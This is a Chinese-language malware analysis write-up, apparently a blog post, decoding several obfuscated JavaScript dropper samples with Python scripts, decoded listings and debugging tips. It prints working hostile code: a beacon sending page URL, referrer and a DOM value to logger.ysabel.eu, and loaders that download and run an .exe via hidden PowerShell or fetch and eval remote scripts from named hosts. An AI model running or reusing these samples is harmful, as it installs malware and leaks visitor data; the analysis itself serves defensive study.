本篇是对JS样本做的简单分析第三篇,有点重复的意思,当巩固吧.
0x1 Sample(TotalSamp_myself\Js–166x–63)
// String table of the obfuscated sample.  Every entry is a \xHH-escaped literal and the
// code below never spells a readable string; it only indexes _0x586f[N].  Decoded, the
// table holds the DOM accessors (getElementById, value, URL, referrer, domain), the HTTP
// verb and header values, the SOAP envelope fragments and the beacon endpoint
// http://logger.ysabel.eu/Logger.asmx.
// NOTE(review): entries 33 and 34 decode to `",` and to `"` followed by a line break (the
// array is physically broken across two lines here).  Splitting the decoded line on ','
// therefore yields one extra element and mis-numbers every index from 35 on.
var _0x586f=["\x76\x61\x6C\x75\x65","\x78\x4B\x65\x79\x78","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x55\x52\x4C","\x26","\x26\x61\x6D\x70\x3B","\x72\x65\x70\x6C\x61\x63\x65","\x6B","\x72\x65\x66\x65\x72\x72\x65\x72","\x64\x6F\x63\x75\x6D\x65\x6E\x74","\x65\x72\x72","\x50\x4F\x53\x54","\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x6F\x67\x67\x65\x72\x2E\x79\x73\x61\x62\x65\x6C\x2E\x65\x75\x2F\x4C\x6F\x67\x67\x65\x72\x2E\x61\x73\x6D\x78","\x6F\x70\x65\x6E","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x74\x65\x78\x74\x2F\x78\x6D\x6C","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x75\x74\x66\x2D\x38\x22\x20\x3F\x3E","\x3C\x73\x6F\x61\x70\x3A\x45\x6E\x76\x65\x6C\x6F\x70\x65\x20\x78\x6D\x6C\x6E\x73\x3A\x78\x73\x69\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x33\x2E\x6F\x72\x67\x2F\x32\x30\x30\x31\x2F\x58\x4D\x4C\x53\x63\x68\x65\x6D\x61\x2D\x69\x6E\x73\x74\x61\x6E\x63\x65\x22\x20\x78\x6D\x6C\x6E\x73\x3A\x78\x73\x64\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x33\x2E\x6F\x72\x67\x2F\x32\x30\x30\x31\x2F\x58\x4D\x4C\x53\x63\x68\x65\x6D\x61\x22\x20\x78\x6D\x6C\x6E\x73\x3A\x73\x6F\x61\x70\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x73\x63\x68\x65\x6D\x61\x73\x2E\x78\x6D\x6C\x73\x6F\x61\x70\x2E\x6F\x72\x67\x2F\x73\x6F\x61\x70\x2F\x65\x6E\x76\x65\x6C\x6F\x70\x65\x2F\x22\x3E","\x3C\x73\x6F\x61\x70\x3A\x42\x6F\x64\x79\x3E","\x3C\x4C\x6F\x67\x44\x61\x74\x61\x20\x78\x6D\x6C\x6E\x73\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x79\x73\x61\x62\x65\x6C\x2E\x65\x75\x2F\x22\x3E","\x3C\x6B\x3E","\x3C\x2F\x6B\x3E","\x3C\x75\x72\x6C\x3E","\x64\x6F\x6D\x61\x69\x6E","\x3C\x2F\x75\x72\x6C\x3E","\x3C\x65\x76\x3E","\x3C\x2F\x65\x76\x3E","\x3C\x2F\x4C\x6F\x67\x44\x61\x74\x61\x3E","\x3C\x2F\x73\x6F\x61\x70\x3A\x42\x6F\x64\x79\x3E","\x3C\x2F\x73\x6F\x61\x70\x3A\x45\x6E\x76\x65\x6C\x6F\x70\x65\x3E","\x73\x65\x6E\x64","","\x22\x2C","\x22
","\x44\x4F\x4D\x50\x61\x72\x73\x65\x72","\x70\x61\x72\x73\x65\x46\x72\x6F\x6D\x53\x74\x72\x69\x6E\x67","\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x44\x4F\x4D","\x61\x73\x79\x6E\x63","\x6C\x6F\x61\x64\x58\x4D\x4C","\x6E\x6F\x64\x65\x56\x61\x6C\x75\x65","\x63\x68\x69\x6C\x64\x4E\x6F\x64\x65\x73","\x4C\x6F\x67\x44\x61\x74\x61\x52\x65\x73\x75\x6C\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x75\x6E\x64\x65\x66\x69\x6E\x65\x64","\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x54\x54\x50","\x58\x4D\x4C\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x20\x6E\x6F\x74\x20\x73\x75\x70\x70\x6F\x72\x74\x65\x64"];
// Page-level beacon.  All identifiers are looked up through the table above, so the
// decoded names never appear in the file.  Reading order:
//  - k = document.getElementById("xKeyx").value, then `new visitorData(k)` runs at once;
//    the function declaration is hoisted, and the `var` of the same name is afterwards
//    rebound to the instance.
//  - visitorData(key): stores document.URL ('&' rewritten to '&amp;'), the key and
//    top.document.referrer ('err' when that cross-frame read throws), then POSTs
//    (async, Content-Type text/xml) a SOAP <LogData> body carrying <k>key</k>,
//    <url>document.domain</url> and <ev>objToString(this)</ev> to
//    http://logger.ysabel.eu/Logger.asmx.
//  - objToString(o): joins o.URL, o.k and o.referrer using entries 33/34 (`",` and
//    `"`+newline) as separators; on any exception it falls back to o.URL alone.
//  - parseResponse(xml): parses a reply with DOMParser or, failing that, the
//    Microsoft.XMLDOM ActiveX object, and returns the text of <LogDataResult>.  It is not
//    called anywhere in this sample; `parser` and `xmlDoc` are implicit globals.
//  - CreateXMLHttpRequest(): XMLHttpRequest with a Microsoft.XMLHTTP fallback; throws
//    "XMLHttpRequest not supported" when neither exists.
// Detection: an outbound text/xml POST to logger.ysabel.eu whose body echoes the page
// URL, domain and referrer together with a value read from the DOM.
var k=document[_0x586f[2]](_0x586f[1])[_0x586f[0]];var visitorData= new visitorData(k);function visitorData(_0xf4c7x3){this[_0x586f[3]]=document[_0x586f[3]][_0x586f[6]](_0x586f[4],_0x586f[5]);this[_0x586f[7]]=_0xf4c7x3;try{this[_0x586f[8]]=top[_0x586f[9]][_0x586f[8]][_0x586f[6]](_0x586f[4],_0x586f[5]);} catch(err){this[_0x586f[8]]=_0x586f[10];} ;var _0xf4c7x4=CreateXMLHttpRequest();_0xf4c7x4[_0x586f[13]](_0x586f[11],_0x586f[12],true);_0xf4c7x4[_0x586f[16]](_0x586f[14],_0x586f[15]);var _0xf4c7x5=_0x586f[17]+_0x586f[18]+_0x586f[19]+_0x586f[20]+_0x586f[21]+_0xf4c7x3+_0x586f[22]+_0x586f[23]+document[_0x586f[24]]+_0x586f[25]+_0x586f[26]+objToString(this)+_0x586f[27]+_0x586f[28]+_0x586f[29]+_0x586f[30];_0xf4c7x4[_0x586f[31]](_0xf4c7x5);} ;function objToString(_0xf4c7x7){var _0xf4c7x8=_0x586f[32];try{_0xf4c7x8+=_0xf4c7x7[_0x586f[3]].toString()+_0x586f[33];_0xf4c7x8+=_0x586f[34]+_0xf4c7x7[_0x586f[7]].toString()+_0x586f[33];_0xf4c7x8+=_0x586f[34]+_0xf4c7x7[_0x586f[8]].toString()+_0x586f[33];} catch(err){_0xf4c7x8=_0xf4c7x7[_0x586f[3]].toString();} ;return _0xf4c7x8;} ;function parseResponse(_0xf4c7xa){if(window[_0x586f[35]]){parser= new DOMParser();xmlDoc=parser[_0x586f[36]](_0xf4c7xa,_0x586f[15]);} else {xmlDoc= new ActiveXObject(_0x586f[37]);xmlDoc[_0x586f[38]]=false;xmlDoc[_0x586f[39]](_0xf4c7xa);} ;return xmlDoc[_0x586f[43]](_0x586f[42])[0][_0x586f[41]][0][_0x586f[40]];} ;function CreateXMLHttpRequest(){if( typeof XMLHttpRequest!=_0x586f[44]){return new XMLHttpRequest();} else {if( typeof ActiveXObject!=_0x586f[44]){return new ActiveXObject(_0x586f[45]);} else {throw new Error(_0x586f[46]);} ;} ;} ;
0x2 py脚本
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
' a test module ahoo'
__author__ = 'ahoo'
import codecs
import io
import json
import os
import re
import shutil
import sys
PutPath = '063.JS.vir' # input: the obfuscated JS sample ("JsVirus" file)
OutPath = '63_analysis.txt' # output: the extracted / decoded listing
myJslog = [] # unused at module level: JSVirus_Parse assigns a local of the same name
AuthorSign = True # True until WriteResultFile has written its banner once
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8') # change the default encoding of standard output to UTF-8
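def ReadLogFile(InPath, ReadTye='r'):
    """Read a UTF-8 text file into a list of lines (line endings kept).

    Args:
        InPath: path of the file to read.
        ReadTye: open mode handed to codecs.open, ``'r'`` by default; the
            file is always decoded as UTF-8.

    Returns:
        The lines of the file, or an empty list when InPath does not exist.
    """
    if not os.path.exists(InPath):
        return []
    # ``with`` closes the handle even when decoding fails part-way through;
    # the explicit close() used before was skipped on any exception.
    # (The old ``if None == line`` test could never be true: iterating a
    # file never yields None.)
    with codecs.open(InPath, ReadTye, 'utf-8') as f:
        return list(f)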
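def WriteResultFile(OutRePath, findRe=None, WriteTye='a+'):
    """Append the given lines to OutRePath, preceded once by a banner.

    Args:
        OutRePath: path of the result file.
        findRe: lines to write, one per line (``None`` means nothing).
        WriteTye: open mode, ``'a+'`` by default so repeated calls append.

    Returns:
        True.

    The banner is written only on the first call of the process; the
    module-level flag AuthorSign tracks that.
    """
    global AuthorSign
    # ``None`` instead of a mutable ``[]`` default avoids sharing one list
    # between calls; callers that pass nothing behave exactly as before.
    lines = [] if findRe is None else findRe
    # ``with`` guarantees the handle is closed even if a write fails.
    with codecs.open(OutRePath, WriteTye, 'utf-8') as f:
        if AuthorSign:
            f.write('\n*****************************************************\r\n')
            f.write('* ahoo JsVirusAnalysis ')
            f.write('\n***************************************************\r\n\n')
            AuthorSign = False
        for item in lines:
            f.write(item + '\n')
    return True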
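def _decode_hex_escapes(text):
    # Decode every \xHH escape in one pass.  A callable replacement inserts
    # the character literally, so a decoded backslash or quote is never
    # re-read as a re.sub template, and both hex digits may be 0-9/a-f/A-F
    # (the old pattern only accepted a leading decimal digit).
    return re.sub(r'\\x([0-9a-fA-F]{2})',
                  lambda m: chr(int(m.group(1), 16)), text)


def _split_js_string_array(raw_body):
    # Split the still-escaped body of a JS array literal into decoded entries.
    # Matching quoted literals instead of splitting on ',' keeps an entry such
    # as "\x22\x2C" (a quote plus a comma) whole, so the indexes stay aligned
    # with the _0x586f[N] references used by the script.
    literal = re.compile(r'"((?:[^"\\]|\\.)*)"', re.S)
    return [_decode_hex_escapes(m.group(1)) for m in literal.finditer(raw_body)]


def _inline_array_refs(line, entries, array_name='_0x586f'):
    # Replace each ARRAY[N] token with the entry it names, written as a JS
    # string literal (json.dumps escapes the quotes, backslashes and line
    # breaks that several entries of this sample contain).  Out-of-range
    # indexes are left untouched so the analyst can see them instead of the
    # run aborting with IndexError.
    ref = re.compile(re.escape(array_name) + r'\s*\[\s*(\d+)\s*\]')

    def lookup(m):
        index = int(m.group(1))
        if index < len(entries):
            return json.dumps(entries[index], ensure_ascii=False)
        return m.group(0)

    line = ref.sub(lookup, line)
    # Join literals that were split only to hide strings: "ab" + "cd" -> "abcd".
    # Only a bare '+' between two quotes matches, so a real concatenation such
    # as "..." + document["domain"] + "..." is no longer damaged (the previous
    # pattern also swallowed `"]+"` fragments).
    return re.sub(r'"\s*\+\s*"', '', line)


def JSVirus_Parse():
    """Deobfuscate a JS sample whose strings live in a hex-escaped table.

    Reads the sample at PutPath, decodes the ``_0x586f`` string table,
    replaces every ``_0x586f[N]`` reference in the remaining code with the
    corresponding literal, joins literals split by ``"+"``, appends the
    result to OutPath and opens it in Notepad.

    Returns:
        True when the listing was written, False when the sample contains no
        ``_0x586f`` table.
    """
    # 1. Read the whole sample as one string: in this sample the table is
    #    broken across two lines, so a line-by-line search cannot find it.
    source = ''.join(ReadLogFile(PutPath))

    # 2. Locate the string table and decode it.
    table = re.search(r'var\s+_0x586f\s*=\s*\[(.*?)\]\s*;', source, re.S)
    if table is None:
        print('no _0x586f string table found in ' + PutPath)
        return False
    entries = _split_js_string_array(table.group(1))
    decoded_table = 'var _0x586f = [' + ', '.join(
        json.dumps(e, ensure_ascii=False) for e in entries) + '];'
    print(decoded_table)
    print(entries)

    # 3. Inline the references in everything that is not the table itself.
    remainder = source[:table.start()] + source[table.end():]
    writeList = [decoded_table]
    for line in remainder.splitlines():
        writeList.append(_inline_array_refs(line, entries))

    # 4. Write the listing and open it for the analyst.
    WriteResultFile(OutPath, writeList)
    os.system('notepad.exe ' + OutPath)
    print('The Virus has been analyzed,there is my advice! Thanks!')
    return True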
# Run the analysis only when executed as a script, not when imported.
if __name__ == '__main__':
    JSVirus_Parse()
0x3 输出结果
以下是做过美容(格式化)的输出结果.
// Output of the script above.  NOTE(review): it is not a faithful decode.  Entries 33 and
// 34 of the table contain a quote and a comma, so the split on ',' produced an extra
// element and every index from 35 on is off by one: window["""] is really
// window["DOMParser"], parser["DOMParser"] is parseFromString, and so on down to the error
// message.  The `"+` clean-up regex also removed `"]+"` fragments, which is why
// document["domain</url><ev>" appears where the sample has document["domain"] + "</url><ev>".
// The SOAP declaration string also looks re-spaced, presumably by the beautifier treating the
// decoded quotes as string boundaries.  Treat this listing as an analyst's transcript, not as
// runnable code.
var _0x586f=["value","xKeyx","getElementById","URL","&","&","replace","k","referrer","document","err","POST","http://logger.ysabel.eu/Logger.asmx","open","Content-Type","text/xml","setRequestHeader","<?xml version="1.0" encoding="utf-8" ?>","<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">","<soap:Body>","<LogData xmlns="http://ysabel.eu/">","<k>","</k>","<url>","domain","</url>","<ev>","</ev>","</LogData>","</soap:Body>","</soap:Envelope>","send","","",",""","DOMParser","parseFromString","Microsoft.XMLDOM","async","loadXML","nodeValue","childNodes","LogDataResult","getElementsByTagName","undefined","Microsoft.XMLHTTP","XMLHttpRequest not supported"];
var k = document["getElementById"]("xKeyx")["value"];
var visitorData = new visitorData(k);
function visitorData(_0xf4c7x3) {
this["URL"] = document["URL"]["replace"]("&", "&");
this["k"] = _0xf4c7x3;
try {
this["referrer"] = top["document"]["referrer"]["replace"]("&", "&");
} catch (err) {
this["referrer"] = "err";
};
var _0xf4c7x4 = CreateXMLHttpRequest();
_0xf4c7x4["open"]("POST", "http://logger.ysabel.eu/Logger.asmx", true);
_0xf4c7x4["setRequestHeader"]("Content-Type", "text/xml");
var _0xf4c7x5 = "<?xml version=" 1.0 " encoding="utf - 8 " ?><soap:Envelope xmlns:xsi="http: //www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/<soap:Body><LogData xmlns="http://ysabel.eu/<k>"+_0xf4c7x3+"</k><url>"+document["domain</url><ev>"+objToString(this)+"</ev></LogData></soap:Body></soap:Envelope>";_0xf4c7x4["send"](_0xf4c7x5);} ;function objToString(_0xf4c7x7){var _0xf4c7x8="";try{_0xf4c7x8+=_0xf4c7x7["URL"].toString()+"";_0xf4c7x8+="+_0xf4c7x7["k"].toString()+"";_0xf4c7x8+="+_0xf4c7x7["referrer"].toString()+"";} catch(err){_0xf4c7x8=_0xf4c7x7["URL"].toString();} ;return _0xf4c7x8;} ;function parseResponse(_0xf4c7xa){if(window["""]){parser= new DOMParser();xmlDoc=parser["DOMParser"](_0xf4c7xa,"text/xml");} else {xmlDoc= new ActiveXObject("parseFromString");xmlDoc["Microsoft.XMLDOM"]=false;xmlDoc["async"](_0xf4c7xa);} ;return xmlDoc["LogDataResult"]("childNodes")[0]["nodeValue"][0]["loadXML"];} ;function CreateXMLHttpRequest(){if( typeof XMLHttpRequest!="getElementsByTagName"){return new XMLHttpRequest();} else {if( typeof ActiveXObject!="getElementsByTagName"){return new ActiveXObject("undefined");} else {throw new Error("Microsoft.XMLHTTP");} ;} ;} ;
0x4 注意
[1]生成代码后做个美容(格式化)
http://www.css88.com/tool/js_beautify/
[2]正则测试工具(F:\RegTestTool.exe)
0x5下面做点扩充吧,js的都往后续…
0x5.1 Num25
// The ProgID is assembled at run time: 'Shell.TrimiApplication'.replace('Trimi','') is
// "Shell.Application", so the literal never appears in the file.
var d=new ActiveXObject('Shell.TrimiApplication'.replace('Trimi',''));
// ShellExecute launches PowerShell, which downloads http://pomf.nyafuu.org/files/hekycc.exe
// as hajdebabuchajde.pif and starts it; the trailing 0 is the vShow argument (hidden window).
// Detection: the script host spawning powershell.exe with WebClient.DownloadFile /
// Start-Process in its command line, and a .pif written next to the script.
d.ShellExecute("PowerShell","(New-Object System.Net.WebClient).DownloadFile('http://pomf.nyafuu.org/files/hekycc.exe','hajdebabuchajde.pif');Start-Process 'hajdebabuchajde.pif'","","",0);
0x5.2 Num41
// m is sent as the query string and is also the marker that the reply is split on.
var m = "rZJ-8RCo-l6L4KpmDDYk-Djc_A3rIzZDBY0MtnHpZMggmgBiXlxzsG70G_17kBhVkZlNn9wUQQ0";
// The two hosts are tried in order; the first 200 reply ends the loop.
var x = new Array("jaysonandfrisby.com","romiecoston.com");
var z1 = "Msxml2.XMLHTTP";
var z4 = "a";
for (var i=0; i<2; i++) {
var e = new ActiveXObject(z1);
try {
// Synchronous GET of http://<host>/counter/?<m>.
e.open("GET", "http://"+x[i]+"/counter/?"+m, false); e.send();
if (e.status == 200) {
// The reply is a second-stage script in which every occurrence of m stands for the
// letter "a" (z4); split/join restores it before eval runs it.
var z3 = e.responseText;
var z3 = z3.split(m);
var z3 = z3.join(z4);
eval(z3);
break; }
; }
// Any failure (unreachable host, non-200 status, bad reply) is swallowed and the next
// host is tried; note that catch(e) also shadows the request object e.
catch(e)
{ };
};
0x5.3 Num29
0x5.3.1样本
// Cache-buster appended to the download URL.
var random=function(){return Math.random()};
try{
// The hex escapes decode to WScript.CreateObject("MSXML2.XMLHTTP"): this runs under the
// Windows Script Host, not in a browser.
var objHttp=WScript.CreateObject("\x4D\x53\x58\x4D\x4C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50");
// Synchronous GET of https://dl-phdzmfjh.nl/p2e.js?<random>.
objHttp.Open("\x47\x45\x54","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x6C\x2D\x70\x68\x64\x7A\x6D\x66\x6A\x68\x2E\x6E\x6C\x2F\x70\x32\x65\x2E\x6A\x73\x3F"+ random(),false);
// On 200 the fetched script is eval'd with downAndExec("pg6v"); appended, so the reply
// presumably defines downAndExec; nothing in this file does.
objHttp.Send();if(objHttp.Status== 200){
eval(objHttp.responseText+ "\x64\x6F\x77\x6E\x41\x6E\x64\x45\x78\x65\x63\x28\x22\x70\x67\x36\x76\x22\x29\x3B")}
}
// Every error is swallowed, so a failed download leaves no trace in the script's output.
catch(e){}
0x5.3.2Py代码
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
' a test module ahoo'
__author__ = 'ahoo'
import sys
import io
import os
import codecs
import re
import shutil
PutPath = '029.JS.vir' # input: the obfuscated JS sample
OutPath = '29_analysis.txt' # output: the extracted / decoded listing
myJslog = [] # unused at module level: JSVirus_Parse assigns a local of the same name
AuthorSign = True # True until WriteResultFile has written its banner once
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8') # change the default encoding of standard output to UTF-8
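def ReadLogFile(InPath, ReadTye='r'):
    """Read a UTF-8 text file into a list of lines (line endings kept).

    Args:
        InPath: path of the file to read.
        ReadTye: open mode handed to codecs.open, ``'r'`` by default; the
            file is always decoded as UTF-8.

    Returns:
        The lines of the file, or an empty list when InPath does not exist.
    """
    if not os.path.exists(InPath):
        return []
    # ``with`` closes the handle even when decoding fails part-way through;
    # the explicit close() used before was skipped on any exception.
    # (The old ``if None == line`` test could never be true: iterating a
    # file never yields None.)
    with codecs.open(InPath, ReadTye, 'utf-8') as f:
        return list(f)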
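def WriteResultFile(OutRePath, findRe=None, WriteTye='a+'):
    """Append the given lines to OutRePath, preceded once by a banner.

    Args:
        OutRePath: path of the result file.
        findRe: lines to write, one per line (``None`` means nothing).
        WriteTye: open mode, ``'a+'`` by default so repeated calls append.

    Returns:
        True.

    The banner is written only on the first call of the process; the
    module-level flag AuthorSign tracks that.
    """
    global AuthorSign
    # ``None`` instead of a mutable ``[]`` default avoids sharing one list
    # between calls; callers that pass nothing behave exactly as before.
    lines = [] if findRe is None else findRe
    # ``with`` guarantees the handle is closed even if a write fails.
    with codecs.open(OutRePath, WriteTye, 'utf-8') as f:
        if AuthorSign:
            f.write('\n*****************************************************\r\n')
            f.write('* ahoo JsVirusAnalysis ')
            f.write('\n***************************************************\r\n\n')
            AuthorSign = False
        for item in lines:
            f.write(item + '\n')
    return True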
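def JSVirus_Parse():
    """Decode every ``\\xHH`` escape in the sample at PutPath.

    Each line of the input is decoded, echoed to stdout, appended to OutPath
    and the result is opened in Notepad.

    Returns:
        True.
    """
    # 1. Read the sample into a list of lines.
    myJslog = ReadLogFile(PutPath)
    # Both hex digits may be 0-9/a-f/A-F; the previous pattern only accepted
    # a leading decimal digit and so left escapes such as \xA0 untouched.
    hex_escape = re.compile(r'\\x([0-9a-fA-F]{2})')
    writeList = []
    for line in myJslog:
        # 2. One pass with a callable replacement: the decoded character is
        #    inserted literally, so a decoded backslash or quote can never be
        #    mis-read as a re.sub template (chr(0x5C) as a template raises).
        decoded = hex_escape.sub(lambda m: chr(int(m.group(1), 16)), line)
        print(decoded)
        writeList.append(decoded)
    # 3. Write the listing and open it for the analyst.
    WriteResultFile(OutPath, writeList)
    os.system('notepad.exe ' + OutPath)
    print('The Virus has been analyzed,there is my advice! Thanks!')
    return True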
# Run the analysis only when executed as a script, not when imported.
if __name__ == '__main__':
    JSVirus_Parse()
0x5.3.3输出
*****************************************************
* ahoo JsVirusAnalysis
***************************************************
// Decoded output of the script above.  NOTE(review): the hex decode turns \x22 into a bare
// double quote, so the eval argument on the Status==200 line is no longer one string
// literal; the sample concatenates responseText with 'downAndExec("pg6v");'.  Read the
// listing as a transcript, not as runnable code.
var random=function(){
return Math.random()};
try{
var objHttp=WScript.CreateObject("MSXML2.XMLHTTP");
objHttp.Open("GET","https://dl-phdzmfjh.nl/p2e.js?"+ random(),false);
objHttp.Send();if(objHttp.Status== 200){
eval(objHttp.responseText+ "downAndExec("pg6v");")}
}
catch(e){}
0x6 小结
强调一点:复杂的看不懂的先美化,就好找规律多了
【调试】js/vbs(默认调试器vs2013):cmd:WScript.exe /x name.js/vbs
【调试】JS(od-找downhttp):OD载入wscript.exe,调试->参数(jsPath),ctrl+F2,bp UrlCanonicalizeA/W,F9.
【调试】正则工具: F:\RegTestTool.exe
【代码美化-VB】(http://tools.jb51.net/code/vbscodeformat)
【代码美化-JS】http://www.css88.com/tool/js_beautify/
【VB关键字】executeglobal(str) EXECUTE(str)
【写入法核心】set fso = CreateObject("Scripting.FileSystemObject"):set f = fso.CreateTextFile("C:\VbsVirLog.txt", true):f.Write(str)
【正则】1.替换"+": plus = re.compile(r'"[\s\S]{0,3}\+[\s\S]{0,3}"') ;line = plus.sub('',line)
2.替换某一行中的所有符合条件
# NOTE(review): findall() followed by sub(count=1) replaces one reference per
# pass (quadratic in the number of references) and treats repStr as a re.sub
# template, so a backslash in repStr is re-interpreted; sub() with a callable
# replacement does it in one pass and inserts the text literally.
''' for test
line11 = "var k=document[_0x586f[2]](_0x586f[1])[_0x586f[0]];"
print(line11)
pattern_arrary= re.compile('(_0x586f\s*\[\d{1,3}])')
for arrary in re.findall('_0x586f\s*\[(\d{1,3})]',line11):
index = int(arrary)
repStr = "*haha*"
line11 = pattern_arrary.sub(repStr,line11,count=1)
print(line11)
'''
3.替换\x56为char
# NOTE(review): the sample line below is a plain (non-raw) Python literal, so the
# parser already turns "\x4D" into "M" and pattern_ascii.findall() matches nothing;
# write it as r'...' to exercise the regex the way the real script sees file input.
'''
line = 'var objHttp=WScript.CreateObject("\x4D\x53\x58\x4D\x4C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50");'
pattern_ascii = re.compile(r'(\\x([0-9][a-zA-Z0-9]))')
for i in pattern_ascii.findall(line):
#方法1
#line = line.replace(i[0], chr(int(i[1],16)))
#方法2
pattern_temp = re.compile(r'(\\x[0-9][a-zA-Z0-9])')
line = pattern_temp.sub(chr(int(i[1],16)),line,count =1)
print(line)
'''